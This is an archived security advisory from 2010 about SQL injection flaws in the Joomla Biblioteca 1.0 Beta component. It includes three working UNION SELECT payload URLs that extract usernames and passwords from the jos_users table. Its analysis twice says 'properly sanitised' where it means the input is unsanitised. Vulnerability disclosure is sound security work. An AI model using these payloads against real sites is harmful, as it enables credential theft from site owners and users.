Joomla Biblioteca 1.0 Beta SQL Injection

Joomla Biblioteca 1.0 Beta SQL Injection: Posted Aug 23, 2010; Authored by Salvatore Fresta; The Joomla Biblioteca component version 1.0 Beta suffers from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | 33c428cd3ada802505f237332a1470c5202e0ece4b1b0ca8bca89a2c33eb3c8a; Download | Favorite | View

Joomla Biblioteca 1.0 Beta SQL Injection

Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

 Name              Biblioteca
 Vendor            http://www.cielostellato.info
 Versions Affected 1.0 Beta

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-21

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

Component  that  allows  the automatic  management  of a
library  in  electronic format. It' can manage books and
their  loans  through   an   attractive  graphical  user
interface simple and usable.


II. DESCRIPTION
_______________

This component doesn't use the common Joomla's functions
to  get  the parameters's value from GET, POST etc.. and
all  of  these  are  not properly sanitised before being
used in SQL queries.


III. ANALYSIS
_____________

Summary:

 A) Multiple Blind SQL Injection
 B) Multiple SQL Injection
 

A) Multiple Blind SQL Injection
_______________________________


The  parameter  testo  passed  to  bi.php (site and admin
frontends)  is  properly sanitised before being used in a
SQL query.This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.


B) Multiple SQL Injection
_________________________

The  parameter testo  passed  to  stampa.php, pdf.php and 
models/biblioteca.php (when "view" is set to "biblioteca"
) is  properly sanitised before being used in SQL queries.
This  can  be  exploited to  manipulate  SQL  queries  by
injecting arbitrary SQL code.


IV. SAMPLE CODE
_______________

A) Multiple SQL Injection

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23


V. FIX
______

No fix.

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Joomla Biblioteca 1.0 Beta SQL Injection

Joomla Biblioteca 1.0 Beta SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Biblioteca 1.0 Beta SQL Injection

Share This

Joomla Biblioteca 1.0 Beta SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems